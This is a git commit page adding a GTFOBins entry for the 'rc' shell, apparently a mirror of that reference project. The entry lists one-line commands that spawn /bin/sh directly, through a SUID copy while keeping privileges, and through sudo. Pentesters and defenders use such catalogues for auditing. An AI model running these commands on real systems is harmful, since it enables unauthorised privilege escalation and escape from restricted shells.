1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
install: apt-get install rc -y
man: https://manpages.ubuntu.com/manpages/xenial/man1/rc.1.html
This commit is contained in:
Miguel R 2023-03-25 20:29:50 +01:00 committed by Andrea Cardaci
parent c2bbbd699d
commit 9b2a297c6d

9
_gtfobins/rc.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
shell:
- code: rc -c '/bin/sh'
suid:
- code: ./rc -c '/bin/sh -p'
sudo:
- code: sudo rc -c '/bin/sh'
---